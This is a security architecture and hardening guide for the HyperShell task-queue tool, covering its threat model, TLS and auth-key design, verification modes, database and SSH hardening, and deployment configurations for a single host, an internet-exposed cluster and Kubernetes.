Security
Overview
HyperShell runs arbitrary shell commands on every machine that connects to its task queue. A HyperShell deployment is therefore only ever as secure as the network it operates on and the authentication material that gates it. This document describes the security architecture, the cryptographic protections built into the queue transport, and the recommended deployment patterns for trusted networks, public-internet exposure, and Kubernetes.
The two security primitives users need to understand are:
a shared authentication key that both server and clients must hold to participate in the queue, and
an end-to-end TLS layer that protects every byte of queue traffic on the wire.
Both are enabled by default and configured so that the most common deployment scenario — a
single-host LocalCluster — works out of the box with no operator action required.
Architecture
Components
HyperShell is built on Python’s multiprocessing.managers.BaseManager and
multiprocessing.JoinableQueue infrastructure. The runtime decomposes into three
roles:
Submit ingests shell commands from stdin or files and writes them to the database (SQLite or PostgreSQL) with stable UUIDs.
Server pulls pending tasks from the database, bundles them, and exposes four JoinableQueue instances to clients via RPC over TCP:
  scheduled: task bundles awaiting execution
  completed: results returned from clients
  heartbeat: periodic liveness reports from clients
  confirmed: explicit acknowledgement of received bundles
Client connects to the server, pulls bundles from the scheduled queue, spawns shell subprocesses, and returns results on the completed queue.
The cluster command (hsx) composes the three roles in a single process group for
local-only or SSH-distributed workflows.
Threat Model
Because tasks are arbitrary shell commands, the queue must be treated as a privileged channel:
Arbitrary code execution. Any party able to enqueue a task can run it on every connected client. Connection authentication is therefore the primary security control, not an optional convenience.
Data exposure. Task definitions, exit status, timing, and heartbeat data travel through the queue. Task stdout and stderr do not: they are written to disk on the client (locally, or on a shared filesystem if one is configured) and retrieved on demand over SFTP via SSHConnection when the operator runs hs task info --stdout or similar. Without transport encryption, the metadata that does flow over the queue (including the authentication handshake) is readable on the wire.
Active network attacks. Unencrypted traffic is vulnerable to man-in-the-middle modification, command injection, and replay. With encryption but no peer authentication, it is vulnerable to active impersonation.
Rogue clients. A client that holds the auth key can join the queue and pull tasks; a stolen key effectively grants full task-execution privileges on every node the client can reach.
Denial of service. Neither connection flooding nor application-level resource exhaustion is mitigated by cryptography. The queue transport imposes no handshake timeout, frame-size cap, or connection limit of its own (see the Built-in TLS Limitations below), so DoS resistance must come from firewall and rate-limit controls at the network layer.
The defenses below directly address arbitrary code execution, data exposure, and active network attacks, and partially address rogue clients. DoS mitigation is provided at the network perimeter, not by the queue transport.
Built-in TLS
Overview
HyperShell speaks TLS natively for its queue transport. No external middleware (stunnel,
nginx, a sidecar) is required: when TLS is enabled, the listener, the connect path, and every
per-proxy RPC opened by multiprocessing.managers.BaseProxy are wrapped with TLS
automatically. The implementation lives in hypershell.core.tls and
hypershell.core.queue.
TLS is enabled by default. The default configuration is designed so that a fresh install
on a single host can run hsx without any operator intervention: certificates are
generated on first start, the client trusts the same certificate file via a shared
filesystem path, and the queue proceeds over an encrypted, authenticated channel.
How It Works
A dedicated serializer key, 'hypershell-tls', is registered in
multiprocessing.managers.listener_client and points to a TLS-aware listener/client
pair (hypershell.core.queue.SecureListener and
hypershell.core.queue.secure_client()). Whenever a manager is constructed with this
serializer, every byte on the wire — the initial handshake, the BaseManager challenge/
response, every per-proxy RPC, and every server-side accept — transparently routes through
TLS.
The hypershell.core.queue.SecureManager class selects this serializer when an active
hypershell.core.tls.TLSConfig is supplied. If TLS is disabled (or no configuration
is found), SecureManager is byte-for-byte equivalent to a stock BaseManager with
the default pickle serializer, so cleartext deployments remain supported for
constrained environments.
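To make the serializer hook concrete, here is a minimal sketch that registers a custom entry in multiprocessing.managers.listener_client. It is not HyperShell's SecureListener / secure_client(): the key 'demo-wrapped', CountingListener, and counting_client are hypothetical, and they only count connections at the point where a real implementation would wrap the socket in TLS. listener_client is an undocumented internal of CPython's multiprocessing.managers, so the sketch relies on implementation details.

```python
import queue
import threading
from multiprocessing import connection, managers

# Hypothetical serializer key for this sketch (HyperShell registers 'hypershell-tls').
DEMO_KEY = "demo-wrapped"


class CountingListener(connection.Listener):
    """Server side: a TLS implementation would wrap each accepted socket here."""
    accepted = 0

    def accept(self):
        conn = super().accept()
        CountingListener.accepted += 1
        return conn


def counting_client(address, family=None, authkey=None):
    """Client side: a TLS implementation would perform the handshake here."""
    counting_client.calls += 1
    return connection.Client(address, family=family, authkey=authkey)


counting_client.calls = 0

# Any manager or proxy built with serializer=DEMO_KEY now uses this pair.
managers.listener_client[DEMO_KEY] = (CountingListener, counting_client)


class QueueManager(managers.BaseManager):
    pass


shared = queue.Queue()
QueueManager.register("get_queue", callable=lambda: shared)
AUTHKEY = b"example-only-authkey"  # illustration only

# Serve from a background thread of this process rather than a child process.
server = QueueManager(address=("127.0.0.1", 0), authkey=AUTHKEY,
                      serializer=DEMO_KEY).get_server()
threading.Thread(target=server.serve_forever, daemon=True).start()

client = QueueManager(address=server.address, authkey=AUTHKEY, serializer=DEMO_KEY)
client.connect()
q = client.get_queue()   # the returned proxy also opens connections via counting_client
q.put("echo hello")
result = q.get()
print(result, counting_client.calls, CountingListener.accepted)
```

Every proxy the client creates looks up the same registered pair, which is why the client counter exceeds the single connect() call: the hook sees all per-proxy RPC connections, not only the first one.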
Authentication Key
Independent of TLS, the queue gates connections with a shared authentication key, which is never sent over the queue socket. The key is used directly (ASCII-encoded) as the secret for the standard multiprocessing handshake, an HMAC challenge/response over a fresh per-connection nonce:
authkey = config.server.auth.encode('ascii')
An eavesdropper on the queue transport cannot recover the auth string from the handshake and
cannot forge a valid response without it, and the per-connection nonce precludes replay of a
captured exchange. This holds against a passive observer, and against an active attacker only
once the TLS peer has been verified (via cafile + servername or a pinned
fingerprint). The handshake is not cryptographically bound to the TLS channel, so in
insecure mode — where the peer is not authenticated — an active man-in-the-middle can
relay the challenge/response. Verify the peer, and do not use insecure mode on untrusted
networks, so the key is exchanged only with the intended server.
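The handshake properties described above can be modelled in a few lines. This is a simplified sketch of an HMAC challenge/response, not CPython's multiprocessing.connection protocol (whose digest and message framing differ between Python versions); new_challenge, answer, and verify are hypothetical names.

```python
import hashlib
import hmac
import secrets


def new_challenge() -> bytes:
    """Server side: a fresh random nonce for every connection."""
    return secrets.token_bytes(32)


def answer(authkey: bytes, challenge: bytes) -> bytes:
    """Client side: prove knowledge of the key without transmitting it."""
    return hmac.new(authkey, challenge, hashlib.sha256).digest()


def verify(authkey: bytes, challenge: bytes, response: bytes) -> bool:
    """Server side: constant-time comparison against the expected MAC."""
    return hmac.compare_digest(answer(authkey, challenge), response)


key = "example-shared-key-1234".encode("ascii")
challenge = new_challenge()
response = answer(key, challenge)

print(verify(key, challenge, response))                      # True: correct key
print(verify(b"wrong-key-wrong-key", challenge, response))   # False: wrong key
print(verify(key, new_challenge(), response))                # False: replay against a new nonce
```

Only the nonce and the MAC cross the wire, so a passive observer learns neither the key nor a response that will be accepted on a later connection. Nothing here ties the exchange to a TLS session, which is why an unauthenticated TLS peer can still relay it.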
For LocalCluster, RemoteCluster, SSHCluster, and autoscaling invocations,
HyperShell generates a fresh random key for every invocation via secrets.token_hex(64),
scoped to that single cluster lifetime; the operator never sees or configures it. For
standalone hs server / hs client deployments, the operator supplies the key via
configuration, environment, or the --auth CLI option.
To keep the shared secret meaningful, hs server refuses to start with the built-in
placeholder key and enforces a minimum key policy: the key must be at least 16 characters and
drawn from [A-Za-z0-9._+/=-] (which admits hex, URL-safe tokens, and standard Base64). The
key generators used in the deployment guides below satisfy this policy.
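A sketch of the key policy as stated, plus two generators that satisfy it. check_auth_key and PLACEHOLDER are hypothetical; the real placeholder string and the check performed inside hs server are not reproduced here.

```python
import base64
import re
import secrets

# Policy stated above: at least 16 characters drawn from [A-Za-z0-9._+/=-].
_KEY_PATTERN = re.compile(r"[A-Za-z0-9._+/=-]{16,}")

# Hypothetical stand-in for the built-in placeholder value.
PLACEHOLDER = "<placeholder-auth-key>"


def check_auth_key(key: str) -> str:
    """Return the key unchanged if it satisfies the policy, else raise ValueError."""
    if key == PLACEHOLDER:
        raise ValueError("refusing to start with the built-in placeholder key")
    if not _KEY_PATTERN.fullmatch(key):
        raise ValueError("key must be >= 16 characters from [A-Za-z0-9._+/=-]")
    return key


# Per-cluster style: 64 random bytes rendered as 128 hex characters.
hex_key = secrets.token_hex(64)
# Equivalent of `openssl rand -base64 48`: 48 bytes encode to 64 Base64 characters.
b64_key = base64.b64encode(secrets.token_bytes(48)).decode("ascii")

for candidate in (hex_key, b64_key):
    check_auth_key(candidate)
```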
The key is visible on the client command line in cluster launches
For SSHCluster and the MPI/SLURM launchers, the per-invocation key is passed to each
client process as a -k command-line argument. On multi-user client hosts it is
therefore visible in the process table (ps / /proc) and scheduler accounting for
the lifetime of the client, even though it is redacted from HyperShell’s own launch
logs. Treat every host that holds the key as inside the trust boundary. A directly
configured server.auth is likewise stored in plaintext in the config file and printed
verbatim by hs config get; prefer the _eval / _env suffixes (see below) to
keep the secret out of the file.
Auto-generated Certificates
The first time a server starts with TLS enabled and cert/key set to '<auto>',
HyperShell generates a self-signed RSA-3072 certificate covering the local FQDN, the short
hostname, localhost, 127.0.0.1, and ::1 and writes the materials under the
site library directory:
Linux / POSIX: $HOME/.hypershell/lib/tls/server.crt and server.key
macOS: $HOME/Library/HyperShell/tls/server.crt and server.key
Windows: %APPDATA%\HyperShell\Library\tls\server.crt and server.key
The private key is written with mode 0600 (owner-only) and the certificate with mode
0644. The SHA-256 fingerprint is logged at INFO level when the certificate is
generated so the operator can paste it into the client configuration of a remote node or
pin it via server.tls.fingerprint.
Subsequent server starts find the existing materials and reuse them — the operation is idempotent. Delete the two files to force regeneration (for example, after the hostname changes).
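To compute a pin without waiting for the INFO log line, a standard-library sketch follows. It assumes the pin is a SHA-256 digest of the DER-encoded certificate, formatted as colon-separated uppercase hex (the same digest convention as openssl x509 -fingerprint -sha256); fingerprint_der, fingerprint_pem, and pin_matches are hypothetical helpers, and fingerprint_pem expects a file holding exactly one certificate, like the auto-generated server.crt.

```python
import hashlib
import hmac
import ssl


def fingerprint_der(der: bytes) -> str:
    """Format the SHA-256 digest of DER bytes as 'SHA256:AB:CD:...'."""
    digest = hashlib.sha256(der).hexdigest().upper()
    return "SHA256:" + ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fingerprint_pem(path: str) -> str:
    """Read a single-certificate PEM file and fingerprint its DER encoding."""
    with open(path, encoding="ascii") as fh:
        return fingerprint_der(ssl.PEM_cert_to_DER_cert(fh.read()))


def pin_matches(der: bytes, pinned: str) -> bool:
    """Compare a presented certificate with a configured pin, ignoring case and whitespace."""
    return hmac.compare_digest(fingerprint_der(der), pinned.strip().upper())
```

Running fingerprint_pem on the server's certificate yields a value suitable for server.tls.fingerprint on a remote client. Only the certificate is read; the private key never needs to leave the server.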
Configuration
TLS is configured under the [server.tls] namespace in the HyperShell TOML config:
[server.tls]
enabled = true # default
cert = "<auto>" # path to server cert, or '<auto>'
key = "<auto>" # path to server key, or '<auto>'
cafile = "<auto>" # trust anchor; '<auto>' = server's own cert (single-host / shared-FS)
fingerprint = "<none>" # 'SHA256:AB:CD:...' pin (overrides cafile verification)
insecure = false # disable peer verification entirely (logs a warning)
min_version = "TLSv1.2" # or 'TLSv1.3'
ciphers = "<none>" # OpenSSL cipher string
servername = "<none>" # SNI / hostname check override
Every key is also exposed via environment variables with the standard HYPERSHELL_ prefix
and the same precedence as other settings (CLI > environment > local config > user config >
system config > defaults):
HYPERSHELL_SERVER_TLS_ENABLED=true
HYPERSHELL_SERVER_TLS_CERT=/etc/hypershell/tls/server.crt
HYPERSHELL_SERVER_TLS_KEY=/etc/hypershell/tls/server.key
HYPERSHELL_SERVER_TLS_CAFILE=/etc/hypershell/tls/ca.crt
HYPERSHELL_SERVER_TLS_FINGERPRINT=SHA256:AB:CD:EF:...
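The precedence order above can be modelled as a layered merge. resolve_tls is a hypothetical helper, not HyperShell's actual loader; it only illustrates the documented order. Iterating over the known keys is what lets HYPERSHELL_SERVER_TLS_MIN_VERSION map to min_version instead of being split at every underscore.

```python
from collections.abc import Mapping

# [server.tls] keys and the defaults listed in the TOML example above.
TLS_DEFAULTS = {
    "enabled": True,
    "cert": "<auto>",
    "key": "<auto>",
    "cafile": "<auto>",
    "fingerprint": "<none>",
    "insecure": False,
    "min_version": "TLSv1.2",
    "ciphers": "<none>",
    "servername": "<none>",
}


def resolve_tls(file_layers: list, environ: Mapping, cli: Mapping = None) -> dict:
    """Merge settings: defaults < system < user < local config < environment < CLI."""
    merged = dict(TLS_DEFAULTS)
    for layer in file_layers:            # ordered system, user, local
        merged.update(layer)
    for key in TLS_DEFAULTS:             # known keys only, so MIN_VERSION stays one word
        var = "HYPERSHELL_SERVER_TLS_" + key.upper()
        if var in environ:
            merged[key] = environ[var]   # still a string; real code would coerce types
    merged.update(cli or {})
    return merged
```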
Peer Verification Modes
The client side of every connection decides how to validate the server certificate. Four modes are supported, in decreasing strength:
CA verification. Set cafile to a trust anchor file (PEM bundle) and servername to the expected hostname. The client validates the chain against that anchor (ssl.CERT_REQUIRED) and checks that the certificate matches the expected name (SNI / SAN check). This is the recommended mode for multi-host deployments with operator-managed PKI. servername is required for server-identity verification, not an optional extra: with cafile set but servername unset, the client verifies only that the certificate chains to the anchor and does not check which host presented it, so any certificate issued by that anchor, from any host, is accepted. Always set servername on untrusted networks.
Fingerprint pinning. Set fingerprint to the server’s SHA256:AB:CD:... digest. The client completes the TLS handshake without CA validation and rejects the connection if the post-handshake fingerprint does not match. Use this when the operator already trusts the server out-of-band and wants minimal configuration, which is typical for self-signed certificates and small clusters.
System CA bundle. Leave cafile, fingerprint, and insecure all unset. The client loads the platform’s default CA store and requires hostname verification. Use this with a real public-CA-issued certificate (e.g., Let’s Encrypt).
Insecure mode. Set insecure = true. The handshake completes but the peer identity is not authenticated. The transport is still encrypted, but with no peer verification an active man-in-the-middle can impersonate the server and relay the auth-key handshake (which is not bound to the TLS channel). Suitable only for transient local debugging on a trusted host; logs a warning on every connection. Do not use it on untrusted networks.
When both cafile and fingerprint are set, fingerprint takes precedence and
cafile is ignored.
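The four modes map naturally onto Python's ssl module. The sketch below is an assumption about how such a client context could be built, not the code in hypershell.core.tls; client_context and check_pin are hypothetical names. Fingerprint mode disables chain validation and checks the pin only after the handshake, and cafile without servername keeps chain validation but turns off the hostname check, mirroring the behavior described above.

```python
import hashlib
import hmac
import ssl

_MIN_VERSIONS = {"TLSv1.2": ssl.TLSVersion.TLSv1_2, "TLSv1.3": ssl.TLSVersion.TLSv1_3}


def client_context(cafile=None, fingerprint=None, insecure=False,
                   servername=None, min_version="TLSv1.2") -> ssl.SSLContext:
    # PROTOCOL_TLS_CLIENT starts with CERT_REQUIRED and check_hostname=True.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = _MIN_VERSIONS[min_version]
    if fingerprint or insecure:
        # Pinning (checked after the handshake) or insecure: no chain validation.
        # check_hostname must be disabled before verify_mode can be CERT_NONE.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    elif cafile:
        ctx.load_verify_locations(cafile=cafile)
        # Without servername only the chain is checked, not which host presented it.
        ctx.check_hostname = servername is not None
    else:
        ctx.load_default_certs()  # system CA bundle with hostname verification
    return ctx


def check_pin(tls_sock: ssl.SSLSocket, fingerprint: str) -> None:
    """Fingerprint mode: compare the presented certificate once the handshake is done."""
    der = tls_sock.getpeercert(binary_form=True) or b""
    actual = hashlib.sha256(der).hexdigest().upper()
    expected = fingerprint.strip().upper().removeprefix("SHA256:").replace(":", "")
    if not hmac.compare_digest(actual, expected):
        tls_sock.close()
        raise ConnectionError("server certificate does not match the pinned fingerprint")
```

A client would then call ctx.wrap_socket(sock, server_hostname=servername or host) and, in fingerprint mode, check_pin(tls_sock, fingerprint) before sending any queue traffic. Checking fingerprint first also reproduces the rule that a pin overrides cafile.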
Limitations
Understanding these properties matters most for deployments on untrusted networks.
No mutual TLS. Clients are not required to present certificates. The shared authentication key authenticates the client to the server; TLS authenticates the server to the client. There is no certificate-based client identity.
Pickle-serialized RPC. The queue is built on Python’s multiprocessing managers, whose RPC serializes objects with pickle in both directions. The authentication key and (non-insecure) TLS peer verification are the controls that gate this channel: a party that holds the key and reaches the server (or, in insecure mode, an active man-in-the-middle) can do more than enqueue tasks, because unpickling attacker-controlled data can execute arbitrary code in the receiving process. Keep the key secret, keep peer verification enabled, and treat every host that holds the key as inside the trust boundary.
Self-signed by default; single-leaf trust. The auto-generated certificate is self-signed (not chained to a public CA), valid for ten years, and has no revocation path; the private key is written to the site directory unencrypted and owner-only (0600), as is normal for an unattended service. With cafile = '<auto>' the client trusts that exact certificate as its own anchor, resolved per host, so this works out of the box only on a single host or a shared filesystem. A standalone remote client must be given the server’s certificate or its pinned fingerprint out of band; otherwise it trusts its own auto-generated certificate and the handshake to the real server fails (do not work around this with insecure mode). Rotating the auto-generated certificate requires redistributing the new certificate or fingerprint to clients.
No transport-level DoS controls. The queue sets no per-connection handshake timeout, no inbound frame-size cap, and no limit on concurrent connections or worker threads. A peer that reaches the listener, including a slow peer that stalls before authenticating, can consume server resources, and failed authentication/handshake attempts are handled by the underlying multiprocessing layer without surfacing in HyperShell’s logs. Denial-of-service protection must come from the network layer (see the deployment guides).
IPv4 only. The built-in TLS queue listener binds AF_INET (IPv4). On IPv6-only or IPv6-preferred networks, clients must reach the server over an IPv4 address.
No pre-shared-key TLS. PSK would be a natural fit for the shared-secret model but is only available in Python 3.13+; HyperShell supports 3.9+.
Adjacent Trust Surfaces
HyperShell’s built-in TLS protects the queue transport and nothing else. A production deployment touches at least two additional security boundaries that the HyperShell process is not in a position to enforce: the task database and (when used) the SSH transport for distributing clients or fetching task output. Both must be hardened independently of the queue.
The Task Database
The database (SQLite or PostgreSQL) is the canonical source of truth for what tasks exist and what their command strings are. The server reads pending tasks from the database and hands them to clients for execution. Anyone who can write rows into the task table can execute arbitrary shell commands on every connected client: that is equivalent to root access on the entire compute fleet if clients run as root, or to user-level access to every client host otherwise.
Securing the database is the operator’s responsibility
HyperShell does not authenticate or authorize callers at the database layer. It trusts the database connection. If you use PostgreSQL, the security of that PostgreSQL instance — network exposure, role/permission model, TLS configuration, backup access — is part of your HyperShell threat surface and must be treated with the same care as the queue itself. A SQL-injection bug in any unrelated application that shares the same database, or a leaked PostgreSQL password, is functionally equivalent to a stolen HyperShell authentication key.
SQLite. When database.provider = 'sqlite' (the default), the database is a local
file under the site library directory. Security reduces to filesystem permissions: the
file should be readable and writable only by the user that runs the HyperShell server.
Avoid placing the SQLite file on a network filesystem unless every host that mounts it is
inside the same trust boundary as the server itself.
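The same owner-only rule applies to server.key and to any auth-key file. Below is a minimal POSIX-only audit sketch (audit_paths is hypothetical) that flags files not owned by the current user or accessible to group or others. SQLite can also create -journal or -wal sidecar files next to the database, which deserve the same check.

```python
import os
import stat


def audit_paths(paths):
    """Return human-readable problems for files that are not private to this user (POSIX)."""
    problems = []
    for path in paths:
        st = os.stat(path)
        if st.st_uid != os.getuid():
            problems.append(f"{path}: owned by uid {st.st_uid}, not {os.getuid()}")
        mode = stat.S_IMODE(st.st_mode)
        # Any read/write/execute bit for group or others is a finding.
        if mode & (stat.S_IRWXG | stat.S_IRWXO):
            problems.append(f"{path}: mode {oct(mode)} grants access to group/others")
    return problems
```

Run as the server's user against the SQLite file and key material; an empty list means every file is owner-only.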
PostgreSQL. When database.provider = 'postgres', the HyperShell server connects
via psycopg 3 (the postgresql+psycopg SQLAlchemy dialect).
HyperShell constructs a standard SQLAlchemy URL and passes it to
sqlalchemy.create_engine(); everything related to transport security is configured
in that URL (or in connect_args) and is delegated to psycopg and the underlying
libpq. HyperShell itself adds nothing.
For production deployments, prefer the postgres-system or postgres-c install extra
over postgres (see Installation): both link the operating-system libpq/OpenSSL, so
the TLS stack receives OS security updates, whereas the default postgres extra bundles a
frozen copy inside the wheel.
Concretely, the database connection is not protected unless your URL says so. A bare
postgresql://user:pass@host/db uses libpq’s default sslmode of prefer: it attempts TLS
opportunistically, silently falls back to cleartext, and never verifies the server’s
certificate. To require TLS and verify the server, add the standard libpq parameters:
[database]
provider = "postgres"
database = "hypershell"
host = "db.example.com"
user = "hypershell"
password_eval = "cat /etc/hypershell/pg-pass.key"
sslmode = "verify-full"
sslrootcert = "/etc/hypershell/pg-ca.crt"
sslmode accepts (in order of strength) disable, allow, prefer, require,
verify-ca, and verify-full. Anything below verify-full is vulnerable to a
man-in-the-middle attack on the database connection (verify-ca checks the certificate
chain but not the hostname). The libpq documentation covers the full parameter set:
https://www.postgresql.org/docs/current/libpq-ssl.html.
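For illustration, the sketch below assembles such a URL with the standard library and refuses anything weaker than verify-full unless explicitly allowed. postgres_url is a hypothetical helper and does not show how HyperShell maps [database] keys onto the URL; with SQLAlchemy installed, sqlalchemy.engine.URL.create(..., query={...}) is the idiomatic way to build the same object.

```python
from urllib.parse import quote, urlencode

# libpq sslmode values, weakest to strongest.
SSLMODES = ("disable", "allow", "prefer", "require", "verify-ca", "verify-full")


def postgres_url(user, password, host, database, *, port=5432,
                 sslmode="verify-full", sslrootcert=None, allow_weak=False):
    if sslmode not in SSLMODES:
        raise ValueError(f"unknown sslmode: {sslmode!r}")
    if sslmode != "verify-full" and not allow_weak:
        raise ValueError(f"sslmode={sslmode} does not verify the server hostname")
    query = {"sslmode": sslmode}
    if sslrootcert:
        query["sslrootcert"] = sslrootcert
    # Percent-encode credentials so characters like '@' or ':' cannot break the URL.
    userinfo = f"{quote(user, safe='')}:{quote(password, safe='')}"
    return f"postgresql+psycopg://{userinfo}@{host}:{port}/{database}?{urlencode(query)}"


url = postgres_url("hypershell", "p@ss:word", "db.example.com", "hypershell",
                   sslrootcert="/etc/hypershell/pg-ca.crt")
```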
In addition to transport security, harden the PostgreSQL instance itself:
Bind PostgreSQL to a non-public interface and restrict access in pg_hba.conf to the hosts that actually run the HyperShell server.
Create a dedicated PostgreSQL role for HyperShell with the minimum privileges needed to operate on the HyperShell schema. Do not reuse the postgres superuser.
Rotate the database password on the same cadence as the HyperShell authentication key.
Treat database backups with the same sensitivity as the live database; they contain the same command strings.
SSH for Cluster Distribution and Output Retrieval
Two HyperShell features rely on SSH:
SSHCluster distributes client processes to remote hosts via paramiko. The host list, key material, and remote shell are all configured through the user’s standard ~/.ssh/config.
hs task info <task> --stdout / --stderr fetches the captured task output from the client host via SFTP (also paramiko), since output is not sent through the queue.
Security for these paths is provided entirely by SSH itself — host key verification, key
rotation, authorized_keys policy, StrictHostKeyChecking, and so on. HyperShell
does not bypass or weaken any of these controls. Treat the SSH configuration that
HyperShell uses with the same care you would treat any other SSH-based automation:
prefer key-based authentication, disable password auth, keep known_hosts populated,
and audit authorized_keys for unexpected entries.
Deployment Guides
Local Single-Host (Default)
For LocalCluster and SSH-distributed workflows on a shared filesystem (the typical
HPC scenario), no operator action is required. The default configuration:
Generates a self-signed certificate on first server start
Writes it to the site library directory readable by every process on the host
Configures the client to trust the same file (cafile = '<auto>' mirrors cert)
Generates a fresh random authentication key per cluster invocation
The most common command therefore needs no security flags:
seq 1000 | hsx -t 'echo {}' -N16
Cross-host workflows over SSH (hsx --ssh 'a[00-32].cluster') inherit the same setup
provided that every host shares the site library directory via NFS, Lustre, GPFS, or
similar. The server writes the certificate once; every SSH-launched client reads it from
the same path.
When the shared filesystem assumption breaks
Each client resolves its TLS trust from its own configuration and environment — the
launchers do not ship certificate material to clients. On a shared filesystem this
resolves to the same server-generated certificate automatically; without one, give each
client the server’s trust anchor out of band. The simplest option is to pin the server
fingerprint (HYPERSHELL_SERVER_TLS_FINGERPRINT=SHA256:..., logged by the server at
INFO on first start); alternatively distribute the certificate to each node and set
HYPERSHELL_SERVER_TLS_CAFILE (with HYPERSHELL_SERVER_TLS_SERVERNAME). Never
distribute the private key.
Linux Cluster Exposed to the Internet
For deployments that accept client connections from outside a trusted network — for example, a head-node HyperShell server reachable over the public internet by remote workers — the recommended configuration uses operator-managed certificates and a strong, operator-managed authentication key.
Step 1 — Generate a strong authentication key.
openssl rand -base64 48 > /etc/hypershell/auth.key
chmod 600 /etc/hypershell/auth.key
chown hypershell:hypershell /etc/hypershell/auth.key
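Distribute this file securely to every client (e.g., via configuration management, a secrets store, or an out-of-band channel). Never check it into source control. The chown above assumes the hypershell system account from Step 5 already exists; create it first.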
Step 2 — Provision a real TLS certificate.
The cleanest path for a server with a stable hostname is Let’s Encrypt via certbot:
certbot certonly --standalone -d hypershell.example.com
This produces /etc/letsencrypt/live/hypershell.example.com/fullchain.pem (cert) and
privkey.pem (key). Configure HyperShell to use them:
# /etc/hypershell.toml
[server]
bind = "0.0.0.0"
auth_eval = "cat /etc/hypershell/auth.key"
[server.tls]
enabled = true
cert = "/etc/letsencrypt/live/hypershell.example.com/fullchain.pem"
key = "/etc/letsencrypt/live/hypershell.example.com/privkey.pem"
min_version = "TLSv1.3"
_eval and _env suffixes
Any setting with an _eval suffix is resolved by shelling out to the named command
and capturing stdout; _env reads the named environment variable. These are
cmdkit features available on every configuration key. They let secrets stay outside
the TOML file. For example, auth_eval = "vault read -field=value secret/hypershell"
or auth_env = "HYPERSHELL_AUTH_VALUE".
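A rough model of how _eval and _env settings resolve, for readers who want to test a secret command before putting it in the TOML file. resolve_setting is hypothetical, and the lookup order (plain value, then _env, then _eval) and the whitespace stripping are assumptions rather than documented cmdkit behavior.

```python
import os
import subprocess


def resolve_setting(section: dict, name: str, environ=os.environ) -> str:
    """Resolve `name` from a plain value, a `<name>_env` variable, or a `<name>_eval` command."""
    if name in section:
        return str(section[name])
    if f"{name}_env" in section:
        return environ[section[f"{name}_env"]]       # KeyError if the variable is unset
    if f"{name}_eval" in section:
        result = subprocess.run(section[f"{name}_eval"], shell=True, check=True,
                                capture_output=True, text=True)
        return result.stdout.strip()                 # drop the trailing newline
    raise KeyError(name)


# e.g. resolve_setting({"auth_eval": "cat /etc/hypershell/auth.key"}, "auth")
```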
For environments without internet-reachable HTTP for ACME validation, use an internal CA
(e.g., HashiCorp Vault PKI, smallstep, FreeIPA). Configure the same cert/key paths
to point at the issued material.
Step 3 — Configure the client to verify the server.
If clients can resolve and connect to a public hostname covered by the server’s cert, leave
cafile unset and let the platform’s default CA store handle verification:
# client-side config
[server]
host = "hypershell.example.com"
auth_eval = "cat /etc/hypershell/auth.key"
If you used an internal CA, distribute the CA’s root certificate to each client and reference it explicitly:
[server.tls]
enabled = true
cafile = "/etc/hypershell/internal-ca.crt"
servername = "hypershell.example.com" # require SAN match
min_version = "TLSv1.3"
If you accept a self-signed certificate (acceptable for small operator-managed deployments),
pin the fingerprint instead — the server logs it at INFO on first start:
[server.tls]
enabled = true
fingerprint = "SHA256:AB:CD:EF:01:23:..."
Step 4 — Restrict network exposure.
Cryptography is not a substitute for network controls. Combine TLS with:
A host firewall (ufw, firewalld, iptables) restricting the server port to known client IP ranges
A perimeter firewall or VPN tunnel for cross-site connectivity
fail2ban or equivalent to throttle abusive connection attempts
OS-level connection limits (iptables -m connlimit to cap concurrent connections per source, -m hashlimit to bound the connection rate)
Step 5 — Run with least privilege.
useradd --system --shell /usr/sbin/nologin hypershell
chown -R hypershell:hypershell /var/lib/hypershell /etc/hypershell
# systemd unit running as User=hypershell, Group=hypershell
Never run the HyperShell server as root. Tasks executed by clients run as whichever
user the client process runs as; constrain that user to the minimum privileges required
for the workload.
Kubernetes Deployment
Kubernetes is a natural fit for HyperShell: the server runs as a long-lived workload
(StatefulSet if backed by SQLite on a PersistentVolume, Deployment if backed
by PostgreSQL), and clients run as elastically scaled Deployment or Job workloads.
Certificate management with cert-manager.
Use cert-manager to provision and rotate the server
certificate. A Certificate resource against an internal Issuer (or ACME-backed
ClusterIssuer) produces a Secret containing tls.crt, tls.key, and
ca.crt:
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: hypershell-server
namespace: hypershell
spec:
secretName: hypershell-server-tls
issuerRef:
name: internal-ca
kind: ClusterIssuer
commonName: hypershell-server.hypershell.svc.cluster.local
dnsNames:
- hypershell-server
- hypershell-server.hypershell
- hypershell-server.hypershell.svc.cluster.local
duration: 2160h # 90 days
renewBefore: 360h # 15 days
Secret for the authentication key.
Store the shared auth key as a Secret rather than embedding it in a manifest:
kubectl create secret generic hypershell-auth \
--namespace hypershell \
--from-literal=auth="$(openssl rand -base64 48)"
Server StatefulSet.
Mount both Secrets into the server pod and expose the TLS configuration via environment variables:
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: hypershell-server
namespace: hypershell
spec:
serviceName: hypershell-server
replicas: 1
selector:
matchLabels: { app: hypershell-server }
template:
metadata:
labels: { app: hypershell-server }
spec:
containers:
- name: server
image: hypershell/hypershell:latest
args: ["hs", "server", "--bind", "0.0.0.0"]
env:
- name: HYPERSHELL_SERVER_TLS_ENABLED
value: "true"
- name: HYPERSHELL_SERVER_TLS_CERT
value: /tls/tls.crt
- name: HYPERSHELL_SERVER_TLS_KEY
value: /tls/tls.key
- name: HYPERSHELL_SERVER_TLS_MIN_VERSION
value: TLSv1.3
- name: HYPERSHELL_SERVER_AUTH
valueFrom:
secretKeyRef: { name: hypershell-auth, key: auth }
ports:
- containerPort: 50001
name: queue
volumeMounts:
- { name: tls, mountPath: /tls, readOnly: true }
- { name: data, mountPath: /var/lib/hypershell }
volumes:
- name: tls
secret: { secretName: hypershell-server-tls }
volumeClaimTemplates:
- metadata: { name: data }
spec:
accessModes: [ReadWriteOnce]
resources: { requests: { storage: 10Gi } }
Service and NetworkPolicy.
Expose the server as a ClusterIP Service and lock down access with a
NetworkPolicy:
apiVersion: v1
kind: Service
metadata:
name: hypershell-server
namespace: hypershell
spec:
selector: { app: hypershell-server }
ports:
- port: 50001
targetPort: 50001
name: queue
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: hypershell-server-allow-clients
namespace: hypershell
spec:
podSelector:
matchLabels: { app: hypershell-server }
policyTypes: [Ingress]
ingress:
- from:
- podSelector:
matchLabels: { app: hypershell-client }
ports:
- { protocol: TCP, port: 50001 }
